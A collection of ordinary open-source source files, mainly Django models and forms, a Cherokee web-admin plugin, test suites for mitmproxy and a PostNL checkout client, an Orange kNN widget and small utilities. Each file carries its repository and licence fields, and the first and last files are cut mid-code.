    place = models.ForeignKey(
        'places.Place',
        related_name='activities',
        on_delete=models.CASCADE,
    )
    participants = models.ManyToManyField(
        settings.AUTH_USER_MODEL,
        related_name='activities',
        through='ActivityParticipant',
        through_fields=('activity', 'user')
    )
    feedback_given_by = models.ManyToManyField(
        settings.AUTH_USER_MODEL,
        related_name='feedback_about_activities',
        through='Feedback',
        through_fields=('about', 'given_by')
    )
    # Start/end datetime range of the activity.
    date = CustomDateTimeRangeField(default=default_activity_date_range)
    # When False, save() pins the end to start + default_duration.
    has_duration = models.BooleanField(default=False)
    description = models.TextField(blank=True)
    max_participants = models.PositiveIntegerField(null=True)  # None = unlimited
    is_disabled = models.BooleanField(default=False)
    last_changed_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        null=True,
        related_name='activities_changed',
        on_delete=models.SET_NULL,
    )
    # Set by ActivityQuerySet.process_finished_activities once the activity
    # has been recorded in history.
    is_done = models.BooleanField(default=False)

    @property
    def group(self):
        return self.place.group

    @property
    def ended_at(self):
        # None while the activity has not finished yet.
        if self.is_not_past():
            return None
        return self.date.end

    def __str__(self):
        return 'Activity {} - {}'.format(self.date.start, self.place)

    def get_timezone(self):
        # `timezone` may be annotated by ActivityManager; otherwise fall back
        # to the group's timezone attribute.
        value = self.timezone if hasattr(self, 'timezone') else self.group.timezone
        return pytz.timezone(value) if isinstance(value, str) else value

    def feedback_due(self):
        # Deadline for giving feedback, or None when the type collects none.
        if not self.activity_type.has_feedback:
            return None
        due = self.date.end + relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS)
        return due.astimezone(self.get_timezone())

    def is_upcoming(self):
        return self.date.start > timezone.now()

    def is_past(self):
        return self.date.end < timezone.now()

    def is_not_past(self):
        return not self.is_past()

    def is_full(self):
        # Unlimited activities (max_participants falsy) are never full.
        if not self.max_participants:
            return False
        return self.participants.count() >= self.max_participants

    def is_participant(self, user):
        return self.participants.filter(id=user.id).exists()

    def is_empty(self):
        return self.participants.count() == 0

    def is_recent(self):
        return self.date.start >= timezone.now() - relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS)

    def empty_participants_count(self):
        # Number of free slots, never negative.
        # NOTE(review): raises TypeError when max_participants is None (the
        # field is nullable) -- presumably only called for limited
        # activities; confirm against callers.
        return max(0, self.max_participants - self.participants.count())

    def add_participant(self, user):
        # Idempotent: re-adding an existing participant returns the same row.
        participant, _ = ActivityParticipant.objects.get_or_create(
            activity=self,
            user=user,
        )
        return participant

    def remove_participant(self, user):
        ActivityParticipant.objects.filter(
            activity=self,
            user=user,
        ).delete()

    def dismiss_feedback(self, user):
        # Stop prompting `user` for feedback about this activity.
        activity_participant = ActivityParticipant.objects.get(
            activity=self,
            user=user,
        )
        activity_participant.feedback_dismissed = True
        activity_participant.save()

    def save(self, *args, **kwargs):
        if not self.has_duration:
            # reset duration to default if activity has no explicit duration
            start = self.date.start
            self.date = CustomDateTimeTZRange(start, start + default_duration)
        super().save(*args, **kwargs)
class ActivityParticipant(BaseModel):
    """Through-model linking a user to an activity they joined."""

    activity = models.ForeignKey(
        Activity,
        on_delete=models.CASCADE,
    )
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
    )
    # True once the user dismissed the "give feedback" prompt (see
    # Activity.dismiss_feedback).
    feedback_dismissed = models.BooleanField(default=False)
    reminder_task_id = models.TextField(null=True)  # stores a huey task id

    class Meta:
        db_table = 'activities_activity_participants'
        # A user can join a given activity only once.
        unique_together = (('activity', 'user'), )
        ordering = ['created_at']
class Feedback(BaseModel):
    """A participant's feedback (optional weight plus comment) for an activity."""

    given_by = models.ForeignKey('users.User', on_delete=models.CASCADE, related_name='feedback')
    about = models.ForeignKey('Activity', on_delete=models.CASCADE)
    weight = models.FloatField(
        blank=True, null=True, validators=[MinValueValidator(-0.01),
                                           MaxValueValidator(10000.0)]
    )
    comment = models.CharField(max_length=settings.DESCRIPTION_MAX_LENGTH, blank=True)
    # just to store legacy values for when feedback_as_sum was False on activities... null otherwise
    # I guess can remove it after a while...
    weight_for_average = models.FloatField(null=True)

    class Meta:
        # One feedback per user per activity.
        unique_together = ('about', 'given_by')
|
yunity/foodsaving-backend
|
karrot/activities/models.py
|
Python
|
agpl-3.0
| 16,263
|
# -*- coding: utf-8 -*-
#
# Cheroke-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2014 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK

# URL the configuration forms below post their changes to (the virtual-server
# number is appended; see Plugin_rehost).
URL_APPLY = '/plugin/rehost/apply'

# User-visible strings; N_ marks them for delayed translation.
# FIX: reworded NOTE_REHOST -- the original text ("against which the hosts be
# Host name will be compared") was garbled English.
NOTE_REHOST = N_("Regular Expression against which the incoming Host name will be compared.")
WARNING_EMPTY = N_("At least one Regular Expression string must be defined.")
class Content (CTK.Container):
    # Renders the configured list of host-matching regular expressions for a
    # virtual server, plus a dialog for adding new entries.

    def __init__ (self, refreshable, key, url_apply, **kwargs):
        CTK.Container.__init__ (self, **kwargs)
        entries = CTK.cfg.keys (key)

        # Warning message
        if not entries:
            # No expressions configured yet: show a warning instead of a list.
            notice = CTK.Notice('warning')
            notice += CTK.RawHTML (_(WARNING_EMPTY))
            self += notice

        # List
        else:
            table = CTK.Table()
            submit = CTK.Submitter(url_apply)
            submit += table
            self += CTK.Indenter(submit)
            table.set_header(1)
            table += [CTK.RawHTML(_('Regular Expressions'))]
            for i in entries:
                e1 = CTK.TextCfg ("%s!%s"%(key,i))
                rm = None
                if len(entries) >= 2:
                    # Offer a delete icon only while more than one entry
                    # remains; removing posts an empty value for the key and
                    # refreshes the view.
                    rm = CTK.ImageStock('del')
                    rm.bind('click', CTK.JS.Ajax (url_apply,
                                                  data = {"%s!%s"%(key,i): ''},
                                                  complete = refreshable.JS_to_refresh()))
                table += [e1, rm]

        # Add New
        table = CTK.PropsTable()
        next = CTK.cfg.get_next_entry_prefix (key)
        table.Add (_('New Regular Expression'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_REHOST))
        submit = CTK.Submitter(url_apply)
        dialog = CTK.Dialog2Buttons ({'title': _('Add New Entry')}, _('Add'), submit.JS_to_submit())
        submit += table
        # On success: refresh the list and close the dialog.
        submit.bind ('submit_success', refreshable.JS_to_refresh())
        submit.bind ('submit_success', dialog.JS_to_close())
        dialog += submit
        self += dialog

        add_new = CTK.Button(_('Add new entry…'))
        add_new.bind ('click', dialog.JS_to_show())
        self += add_new
class Plugin_rehost (CTK.Plugin):
    # Virtual-server "rehost" matching plugin: matches the request host
    # name against a configured list of regular expressions.
    def __init__ (self, key, vsrv_num):
        """key -- plugin config key; vsrv_num -- virtual server number used to build the apply URL."""
        CTK.Plugin.__init__ (self, key)
        pre       = '%s!regex' %(key)
        url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
        self += CTK.RawHTML ("<h2>%s</h2>" % (_('New Regular Expression')))
        # Content
        # Wrapped in a Refreshable so edits can redraw the list via AJAX.
        refresh = CTK.Refreshable ({'id': 'plugin_rehost'})
        refresh.register (lambda: Content(refresh, pre, url_apply).Render())
        self += refresh
# Validation, and Public URLs
# Register the POST endpoint (one per virtual server number) that applies
# the submitted configuration values.
CTK.publish ('^%s/[\d]+'%(URL_APPLY), CTK.cfg_apply_post, method="POST")
|
cherokee/webserver
|
admin/plugins/rehost.py
|
Python
|
gpl-2.0
| 3,388
|
# -*- coding: utf-8 -*-
"""Formulaires de l'application."""
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Station
from .models import Passenger
from django.core.exceptions import ValidationError
def validate_station(value):
    """Validator: raise ValidationError unless *value* names an existing Station."""
    # Short-circuits: no database query is issued for an empty value.
    station_exists = bool(value) and Station.objects.filter(name=value).exists()
    if not station_exists:
        raise ValidationError("La gare de %(value)s n'existe pas.",
                              code='notfound', params={'value': value})
class SearchForm(forms.Form):
    """Search form for journeys between two stations.

    Must be instantiated with a ``passengers`` keyword argument (an
    iterable of Passenger-like objects); it is popped before the base
    ``Form.__init__`` runs, so a missing kwarg raises ``KeyError``.
    """
    ## Available time options.
    # Whether the user wants to depart after, or arrive before, the time
    # they specify.
    TIME_OPTIONS = [
        ('DEPART_AFTER', 'Partir après'),
        ('ARRIVE_BEFORE', 'Arriver avant')
    ]
    ## Name of the departure station.
    startStation = forms.CharField(max_length=40, required=True,
                                   validators=[validate_station])
    ## Name of the arrival station.
    endStation = forms.CharField(max_length=40, required=True,
                                 validators=[validate_station])
    ## Desired travel date.
    travelDate = forms.DateField(required=True)
    ## Time option selector (see TIME_OPTIONS).
    timeOptions = forms.ChoiceField(choices=TIME_OPTIONS)
    ## Hour slot selector (5h to 21h).
    hour = forms.ChoiceField(choices=[(str(i), str(i)) for i in range(5, 22)])
    def __init__(self, *args, **kwargs):
        """Instantiate the search form with a dynamic passenger field."""
        ps = kwargs.pop('passengers')
        super(SearchForm, self).__init__(*args, **kwargs)
        # Bug fix: the field was previously bound to a local variable named
        # ``passengers`` and therefore never registered on the form; it must
        # be added to self.fields for it to validate and render.
        # The field is required only when the user actually has passengers.
        self.fields['passengers'] = forms.MultipleChoiceField(
            required=len(ps) > 0, choices=[(str(p.id), str(p)) for p in ps])
class SignUpForm(UserCreationForm):
    """Sign-up form for the application."""
    ## User's first name (optional).
    first_name = forms.CharField(max_length=30, required=False,
                                 help_text='Optional.')
    ## User's last name (optional).
    last_name = forms.CharField(max_length=30, required=False,
                                help_text='Optional.')
    ## User's e-mail address (required, validated).
    email = forms.EmailField(
        max_length=254, help_text='Required. Inform a valid email address.')
    class Meta:
        """Metadata for the sign-up form."""
        ## Model backing the form.
        model = User
        ## Fields exposed by the form.
        # password1/password2 (with confirmation check) are inherited from
        # Django's default UserCreationForm.
        fields = ('username', 'first_name', 'last_name', 'email', 'password1',
                  'password2', )
class UserForm(forms.ModelForm):
    """Profile-update form for an existing user."""
    class Meta:
        """Metadata for the user-update form."""
        ## Model backing the form.
        model = User
        ## Fields exposed by the form.
        # Field definitions are inherited automatically from the User model.
        # NOTE(review): exposing 'password' as a plain ModelForm field saves
        # the raw value into User.password unhashed -- confirm the view
        # calls set_password() before saving.
        fields = ('first_name', 'last_name', 'email', 'password')
class PassengerForm(forms.ModelForm):
    """Create/update form for a Passenger."""
    ## Passenger's first name (required).
    first_name = forms.CharField(max_length=30, required=True)
    ## Passenger's last name (required).
    last_name = forms.CharField(max_length=30, required=True)
    class Meta:
        """Metadata for the passenger form."""
        ## Model backing the form.
        model = Passenger
        ## Fields exposed by the form.
        fields = ('first_name', 'last_name')
|
DjangoChained/TchouTchouGo
|
main/forms.py
|
Python
|
agpl-3.0
| 3,957
|
from __future__ import division, absolute_import, print_function
import sys
from setuptools.command.egg_info import egg_info as _egg_info
class egg_info(_egg_info):
    """numpy.distutils wrapper around setuptools' egg_info command.

    Ensures generated sources exist before egg_info collects filenames.
    """
    def run(self):
        # Warn on sdist builds: running build_src here can leave generated
        # files out of the source distribution (numpy gh-7127).
        if 'sdist' in sys.argv:
            import warnings
            warnings.warn("`build_src` is being run, this may lead to missing "
                          "files in your sdist! See numpy issue gh-7127 for "
                          "details", UserWarning)
        # We need to ensure that build_src has been executed in order to give
        # setuptools' egg_info command real filenames instead of functions which
        # generate files.
        self.run_command("build_src")
        _egg_info.run(self)
|
JFriel/honours_project
|
venv/lib/python2.7/site-packages/numpy/distutils/command/egg_info.py
|
Python
|
gpl-3.0
| 708
|
from mitmproxy.contentviews import query
from mitmproxy.coretypes import multidict
from . import full_eval
def test_view_query():
    """The query view renders each key/value pair, repeated keys included."""
    data = ""
    view = full_eval(query.ViewQuery())
    rendered = view(data, query=multidict.MultiDict([("foo", "bar"), ("foo", "baz")]))
    assert rendered[0] == "Query"
    expected_rows = [
        [("header", "foo: "), ("text", "bar")],
        [("header", "foo: "), ("text", "baz")],
    ]
    assert rendered[1] == expected_rows
    # Without a query argument the view yields an empty row list.
    assert view(data) == ("Query", [])
|
vhaupert/mitmproxy
|
test/mitmproxy/contentviews/test_query.py
|
Python
|
mit
| 415
|
import datetime
import decimal
from django.test import TestCase
from django.core.cache import cache
from httmock import HTTMock
from django_dynamic_fixture import G, N
from postnl_checkout.contrib.django_postnl_checkout.models import Order
from .base import PostNLTestMixin
class OrderTests(PostNLTestMixin, TestCase):
    """ Tests for Order model. """
    # Show full diffs for the large dict comparisons below.
    maxDiff = None
    def setUp(self):
        """Create the fixture timestamps shared by the request/response XML."""
        super(OrderTests, self).setUp()
        self.order_datum = datetime.datetime(
            year=2011, month=7, day=21,
            hour=20, minute=11, second=0
        )
        self.verzend_datum = datetime.datetime(
            year=2011, month=7, day=22,
            hour=20, minute=11, second=0
        )
    def test_save(self):
        """ Test saving an Order model. """
        instance = N(Order)
        instance.clean()
        instance.save()
    def test_prepare_order(self):
        """ Test prepare_order class method. """
        # Setup mock response
        # The mock asserts the outgoing SOAP request body, then returns a
        # canned XML response.
        def response(url, request):
            self.assertXMLEqual(
                request.body, self.read_file('prepare_order_request.xml')
            )
            return self.read_file('prepare_order_response.xml')
        kwargs = {
            'AangebodenBetaalMethoden': {
                'PrepareOrderBetaalMethode': {
                    'Code': 'IDEAL',
                    'Prijs': '5.00'
                }
            },
            'AangebodenCommunicatieOpties': {
                'PrepareOrderCommunicatieOptie': {
                    'Code': 'NEWS'
                }
            },
            # FIXME: the following is not submitted by SUDS
            # Most probably because it is not properly defined in the WSDL
            # Contact PostNL about this.
            # 'AangebodenOpties': {
            #     'PrepareOrderOptie': {
            #         'Code': 'WRAP',
            #         'Prijs': '2.50'
            #     }
            # },
            # 'AfleverOpties': {
            #     'AfleverOptie': {
            #         'Code': 'PG',
            #         'Kosten': '0.00',
            #         'Toegestaan': True
            #     }
            # },
            'Consument': {
                'ExtRef': 'test@e-id.nl'
            },
            'Contact': {
                'Url': 'http://www.kadowereld.nl/url/contact'
            },
            'Order': {
                'ExtRef': '1105_900',
                'OrderDatum': self.order_datum,
                'Subtotaal': '125.00',
                'VerzendDatum': self.verzend_datum,
                'VerzendKosten': '12.50'
            },
            'Retour': {
                'BeschrijvingUrl': 'http://www.kadowereld.nl/url/beschrijving',
                'PolicyUrl': 'http://www.kadowereld.nl/url/policy',
                'RetourTermijn': 28,
                'StartProcesUrl': 'http://www.kadowereld.nl/url/startproces'
            },
            'Service': {
                'Url': 'http://www.kadowereld.nl/url/service'
            }
        }
        # Execute API call
        with HTTMock(response):
            instance = Order.prepare_order(**kwargs)
        # Assert model field values
        self.assertTrue(instance.pk)
        self.assertEquals(
            instance.order_token, '0cfb4be2-47cf-4eac-865c-d66657953d5c'
        )
        self.assertEquals(
            instance.order_ext_ref, '1105_900'
        )
        self.assertEquals(
            instance.order_date, self.order_datum
        )
        # Assert JSON values
        self.assertEquals(instance.prepare_order_request, kwargs)
        self.assertEquals(instance.prepare_order_response, {
            'Checkout': {
                'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c',
                'Url': (
                    'http://tpppm-test.e-id.nl/Orders/OrderCheckout'
                    '?token=0cfb4be2-47cf-4eac-865c-d66657953d5c'
                )
            },
            'Webshop': {
                'IntRef': 'a0713e4083a049a996c302f48bb3f535'
            }
        })
    def test_read_order(self):
        """ Test read_order method. """
        # Setup mock response
        def response(url, request):
            self.assertXMLEqual(
                request.body, self.read_file('read_order_request.xml')
            )
            return self.read_file('read_order_response.xml')
        instance = G(
            Order,
            order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c'
        )
        # Read order data
        with HTTMock(response):
            new_instance = instance.read_order()
        response_data = new_instance.read_order_response
        self.assertTrue(response_data)
        # Full structural comparison of the parsed SOAP response.
        self.assertEquals(response_data, {
            'Voorkeuren': {
                'Bezorging': {
                    'Tijdvak': {
                        'Start': u'10:30',
                        'Eind': u'08:30'
                    },
                    'Datum': datetime.datetime(2012, 4, 26, 0, 0)
                }
            },
            'Consument': {
                'GeboorteDatum': datetime.datetime(1977, 6, 15, 0, 0),
                'ExtRef': u'jjansen',
                'TelefoonNummer': u'06-12345678',
                'Email': u'j.jansen@e-id.nl'
            },
            'Facturatie': {
                'Adres': {
                    'Huisnummer': u'1',
                    'Initialen': u'J',
                    'Geslacht': u'Meneer',
                    'Deurcode': None,
                    'Gebruik': u'P',
                    'Gebouw': None,
                    'Verdieping': None,
                    'Achternaam': u'Jansen',
                    'Afdeling': None,
                    'Regio': None,
                    'Land': u'NL',
                    'Wijk': None,
                    'Postcode': u'4131LV',
                    'Straat': 'Lage Biezenweg',
                    'Bedrijf': None,
                    'Plaats': u'Vianen',
                    'Tussenvoegsel': None,
                    'Voornaam': u'Jan',
                    'HuisnummerExt': None
                }
            },
            'Webshop': {
                'IntRef': u'a0713e4083a049a996c302f48bb3f535'
            },
            'CommunicatieOpties': {
                'ReadOrderResponseCommunicatieOptie': [
                    {
                        'Text': u'Do not deliver to neighbours',
                        'Code': u'REMARK'
                    }
                ]
            },
            'Bezorging': {
                'ServicePunt': {
                    'Huisnummer': None,
                    'Initialen': None,
                    'Geslacht': None,
                    'Deurcode': None,
                    'Gebruik': None,
                    'Gebouw': None,
                    'Verdieping': None,
                    'Achternaam': None,
                    'Afdeling': None,
                    'Regio': None,
                    'Land': None,
                    'Wijk': None,
                    'Postcode': None,
                    'Straat': None,
                    'Bedrijf': None,
                    'Plaats': None,
                    'Tussenvoegsel': None,
                    'Voornaam': None,
                    'HuisnummerExt': None
                },
                'Geadresseerde': {
                    'Huisnummer': u'1',
                    'Initialen': u'J',
                    'Geslacht': u'Meneer',
                    'Deurcode': None,
                    'Gebruik': u'Z',
                    'Gebouw': None,
                    'Verdieping': None,
                    'Achternaam': u'Janssen',
                    'Afdeling': None,
                    'Regio': None,
                    'Land': u'NL',
                    'Wijk': None,
                    'Postcode': u'4131LV',
                    'Straat': u'Lage Biezenweg ',
                    'Bedrijf': u'E-ID',
                    'Plaats': u'Vianen',
                    'Tussenvoegsel': None,
                    'Voornaam': u'Jan',
                    'HuisnummerExt': None
                }
            },
            'Opties': {
                'ReadOrderResponseOpties': [
                    {
                        'Text': u'Congratulat ions with your new foobar!',
                        'Code': u'CARD',
                        'Prijs': decimal.Decimal('2.00')
                    }
                ]
            },
            'Order': {
                'ExtRef': u'15200_001'
            },
            'BetaalMethode': {
                'Optie': u'0021',
                'Code': u'IDEAL',
                'Prijs': decimal.Decimal('0.00')
            }
        })
    def test_confirm_order(self):
        """ Test confirm_order """
        def response(url, request):
            self.assertXMLEqual(
                request.body, self.read_file('confirm_order_request.xml')
            )
            return self.read_file('confirm_order_response.xml')
        kwargs = {
            'Order': {
                'PaymentTotal': decimal.Decimal('183.25')
            }
        }
        instance = G(
            Order,
            order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
            order_ext_ref='1105_900'
        )
        # Execute API call
        with HTTMock(response):
            instance.confirm_order(**kwargs)
    def test_update_order(self):
        """ Test update_order """
        # Two mocks sharing the same request assertion: one returns a
        # success response, the other a failure response.
        def response_success(url, request):
            self.assertXMLEqual(
                request.body, self.read_file('update_order_request.xml')
            )
            return self.read_file('update_order_response_success.xml')
        def response_fail(url, request):
            self.assertXMLEqual(
                request.body, self.read_file('update_order_request.xml')
            )
            return self.read_file('update_order_response_fail.xml')
        kwargs = {
            'Order': {
                'ExtRef': 'FDK004',
                'Zending': {
                    'UpdateOrderOrderZending': {
                        'Busstuk': {
                            'UpdateOrderOrderZendingBusstuk': {
                                'Verzonden': '23-08-2011 12:00:00'
                            }
                        },
                        'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
                        'Pakket': {
                            'UpdateOrderOrderZendingPakket': {
                                'Barcode': '3s123456789',
                                'Postcode': '4131LV'
                            }
                        }
                    }
                }
            }
        }
        instance = G(
            Order,
            order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
            order_ext_ref='1105_900'
        )
        # Make call fail
        with HTTMock(response_fail):
            self.assertRaises(
                Exception, lambda: instance.update_order(**kwargs)
            )
        # Make call pass
        with HTTMock(response_success):
            response = instance.update_order(**kwargs)
        self.assertTrue(response)
        # Make sure the requested stuff is saved
        # (the order token is merged into the stored request).
        self.assertEquals(
            instance.update_order_request, {
                'Checkout': {
                    'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c'
                },
                'Order': {
                    'ExtRef': 'FDK004',
                    'Zending': {
                        'UpdateOrderOrderZending': {
                            'Busstuk': {
                                'UpdateOrderOrderZendingBusstuk': {
                                    'Verzonden': '23-08-2011 12:00:00'
                                }
                            },
                            'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
                            'Pakket': {
                                'UpdateOrderOrderZendingPakket': {
                                    'Barcode': '3s123456789',
                                    'Postcode': '4131LV'
                                }
                            }
                        }
                    }
                }
            }
        )
    def test_ping_status(self):
        """ Test ping_status """
        instance = G(Order)
        # Counter used to verify the response is served from cache on the
        # second call.
        self.response_called = 0
        def ok_response(url, request):
            # Assert
            self.assertXMLEqual(
                request.body,
                self.read_file('ping_status_request.xml')
            )
            self.response_called += 1
            return self.read_file('ping_status_response_ok.xml')
        def nok_response(url, request):
            return self.read_file('ping_status_response_nok.xml')
        with HTTMock(ok_response):
            self.assertEquals(instance.ping_status(), True)
        self.assertEquals(self.response_called, 1)
        # Repeated call should not cause the response to be called
        with HTTMock(ok_response):
            self.assertEquals(instance.ping_status(), True)
        self.assertEquals(self.response_called, 1)
        # Clear cache
        cache.clear()
        with HTTMock(nok_response):
            self.assertEquals(instance.ping_status(), False)
|
dokterbob/python-postnl-checkout
|
tests/test_django.py
|
Python
|
agpl-3.0
| 13,320
|
import numpy as np
import geopy
from map import Map
class Greengraph(object):
    """Sample how much green is visible along a route between two places."""
    def __init__(self, start, end):
        # Endpoints are free-text place names, resolved via Google's geocoder.
        self.start = start
        self.end = end
        self.geocoder = geopy.geocoders.GoogleV3(domain="maps.google.co.uk")
    def geolocate(self, place):
        """Return the (lat, lon) of the first geocoder match for *place*."""
        matches = self.geocoder.geocode(place, exactly_one=False)
        return matches[0][1]
    def location_sequence(self, start, end, steps):
        """Return *steps* evenly spaced (lat, lon) rows from start to end."""
        latitudes = np.linspace(start[0], end[0], steps)
        longitudes = np.linspace(start[1], end[1], steps)
        return np.vstack([latitudes, longitudes]).transpose()
    def green_between(self, steps):
        """Count green pixels of the map image at each sampled location."""
        route = self.location_sequence(self.geolocate(self.start),
                                       self.geolocate(self.end),
                                       steps)
        return [Map(*point).count_green() for point in route]
|
simonschaal/greengraph
|
greengraph/graph.py
|
Python
|
mit
| 813
|
"""
"""
import Orange.data
import Orange.regression.knn as knn
import Orange.classification
from Orange.preprocess.preprocess import Preprocess
from Orange.widgets import widget, gui
from Orange.widgets.settings import Setting
class OWKNNRegression(widget.OWWidget):
    """Orange widget configuring and emitting a kNN regression learner."""
    name = "k Nearest Neighbors Regression"
    description = "K-nearest neighbours learner/model."
    icon = "icons/kNearestNeighbours.svg"
    priority = 20
    # Input/output channels: (name, type, handler) / (name, type).
    inputs = [("Data", Orange.data.Table, "set_data"),
              ("Preprocessor", Preprocess, "set_preprocessor")]
    outputs = [("Learner", knn.KNNRegressionLearner),
               ("Predictor", Orange.classification.SklModel)]
    want_main_area = False
    # Persisted settings.
    learner_name = Setting("k Nearest Neighbors Regression")
    n_neighbors = Setting(5)
    # Index into self.metrics (display names are mapped in __init__).
    metric_index = Setting(0)
    def __init__(self, parent=None):
        """Build the control-area GUI and emit an initial learner."""
        super().__init__(parent)
        self.preprocessors = ()
        self.data = None
        box = gui.widgetBox(self.controlArea, "Learner/Model Name")
        gui.lineEdit(box, self, "learner_name")
        box = gui.widgetBox(self.controlArea, "Neighbors")
        gui.spin(box, self, "n_neighbors", 1, 100, label="Number of neighbors")
        box = gui.widgetBox(box, "Metric")
        box.setFlat(True)
        box.layout().setContentsMargins(0, 0, 0, 0)
        gui.comboBox(box, self, "metric_index",
                     items=["Euclidean", "Manhattan", "Maximal", "Mahalanobis"])
        # Display names above map positionally onto these sklearn metric
        # identifiers ("Maximal" -> "chebyshev").
        self.metrics = ["euclidean", "manhattan", "chebyshev", "mahalanobis"]
        gui.button(self.controlArea, self, "Apply",
                   callback=self.apply, default=True)
        layout = self.layout()
        self.layout().setSizeConstraint(layout.SetFixedSize)
        # Emit the initial learner so downstream widgets get output at once.
        self.apply()
    def set_data(self, data):
        """Set input training dataset."""
        self.data = data
        if data is not None:
            self.apply()
    def set_preprocessor(self, preproc):
        """Set preprocessor to apply on training data."""
        if preproc is None:
            self.preprocessors = None
        else:
            self.preprocessors = (preproc,)
        self.apply()
    def apply(self):
        """
        Construct the learner and apply it on the training data if available.
        """
        learner = knn.KNNRegressionLearner(
            n_neighbors=self.n_neighbors,
            metric=self.metrics[self.metric_index],
            preprocessors=self.preprocessors
        )
        learner.name = self.learner_name
        model = None
        if self.data is not None:
            model = learner(self.data)
            model.name = self.learner_name
        self.send("Learner", learner)
        self.send("Predictor", model)
|
qusp/orange3
|
Orange/widgets/regression/owknnregression.py
|
Python
|
bsd-2-clause
| 2,723
|
from math import *
from PyQt4 import QtCore
def mySquare(val):
    # NOTE(review): despite the name, this returns the square ROOT of val
    # (as in the original implementation) -- confirm the intended behavior
    # before renaming or changing it.
    return sqrt(val)
"""Function will take the name of an image file and then get
the range of images that associate with that image name. """
def getImageRange (imageDir, imstring) :
    """Scan imageDir for .tif files matching imstring's base name and
    return [min, max, current] image numbers.

    NOTE: Python 2 + PyQt4 code (print statements, QString/QStringList API);
    file names are assumed to end in _xxx.tif where xxx is a 3-digit number.
    Shadows the builtins min/max/str locally.
    """
    # get the index of the start of the .txt suffix then
    # find the start of the _xxx where xxx are the image numbers
    qd = QtCore.QDir (imageDir)
    qd.setNameFilters (QtCore.QStringList()<<"*.tif")
    filelist = qd.entryList()
    nfiles = filelist.count()
    min = 1e6
    max = -1e6
    # Base name = everything between the directory separator and the
    # trailing 3-digit counter before ".tif".
    lastind = imstring.lastIndexOf('.tif')-3
    firstind = imstring.lastIndexOf ("/")
    if (firstind <0) :
        # Fall back to Windows-style path separators.
        firstind = imstring.lastIndexOf('\\')
    firstind = firstind + 1
    matchstring = imstring.mid(firstind, lastind-firstind)
    print 'Debug : Matchstring = ',matchstring
    for i in range(nfiles) :
        print filelist[i]
        if not (filelist[i].contains(".tif")) :
            continue
        if (filelist[i].contains (matchstring)) :
            print i, 'made it'
            # Extract the 3-digit counter; QString.toInt() returns
            # (value, ok) so val[0] is the integer.
            tmpind = filelist[i].lastIndexOf (".tif")
            str = filelist[i].mid(tmpind-3,3)
            val = str.toInt()
            print val[0]
            if (val[0] > max) :
                max = val[0]
            if (val[0] < min) :
                min = val[0]
    print 'Min max are : ', min, max
    # Number of the image that imstring itself refers to.
    tmpind = imstring.lastIndexOf (".tif")
    str = imstring.mid(tmpind-3,3)
    val = str.toInt()
    minmax = [min, max, val[0]]
    return minmax
|
kirillzhuravlev/atrex
|
Software/atrex_utils.py
|
Python
|
lgpl-3.0
| 1,538
|
from Foundation import NSBundle
import halfcaff.util
# Absolute path of the running .app bundle; stays None when running from
# source (dev mode), which disables login-item management below.
APPDIR = None
if not halfcaff.util.is_dev_mode():
    APPDIR = NSBundle.mainBundle().bundlePath()
def is_login_enabled():
    """Return True when the app bundle is registered as a login item."""
    # Outside a bundled app (dev mode) there is nothing to look up.
    if APPDIR:
        return APPDIR in list_login_items()
    return False
def enable_startup_at_login():
    """Register the app bundle as a macOS login item."""
    # NOTE(review): assumes APPDIR is set (bundled app); in dev mode it is
    # None -- confirm callers check dev mode first.
    add_login_item(APPDIR)
def disable_startup_at_login():
    """Remove the app bundle from the macOS login items."""
    # remove_login_item() is a no-op when APPDIR is not currently listed.
    remove_login_item(APPDIR)
#### From https://github.com/pudquick/pyLoginItems/
# /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Headers/LSSharedFileList.h
# Fun things:
# kLSSharedFileListFavoriteItems
# kLSSharedFileListFavoriteVolumes
# kLSSharedFileListRecentApplicationItems
# kLSSharedFileListRecentDocumentItems
# kLSSharedFileListRecentServerItems
# kLSSharedFileListSessionLoginItems
# kLSSharedFileListGlobalLoginItems - deprecated in 10.9
# Runs in user space, use this with a login script / launchd item / something running as the user
# Example usage:
#
# import pyLoginItems
# >>> pyLoginItems.list_login_items()
# [u'/Applications/Dropbox.app', u'/Applications/iTunes.app/Contents/MacOS/iTunesHelper.app']
#
# pyLoginItems.add_login_item('/Applications/Safari.app', 0)
# pyLoginItems.remove_login_item('/Applications/TextEdit.app')
from platform import mac_ver
from Foundation import NSURL
from LaunchServices import kLSSharedFileListSessionLoginItems, kLSSharedFileListNoUserInteraction
# Need to manually load in 10.11.x+
# Bug fix: the original parsed only the *minor* version number
# (int(mac_ver()[0].split('.')[1])), which breaks on macOS 11+ where the
# major version advanced ("11.0" -> minor 0 -> wrong branch, and a bare
# "11" would raise IndexError).  Compare the full (major, minor) tuple.
try:
    os_vers = tuple(int(p) for p in mac_ver()[0].split('.')[:2])
except ValueError:
    # Unparseable / empty version string (e.g. not on a Mac): fall back to
    # the plain LaunchServices imports below.
    os_vers = (0, 0)
if os_vers >= (10, 11):
    from Foundation import NSBundle
    import objc
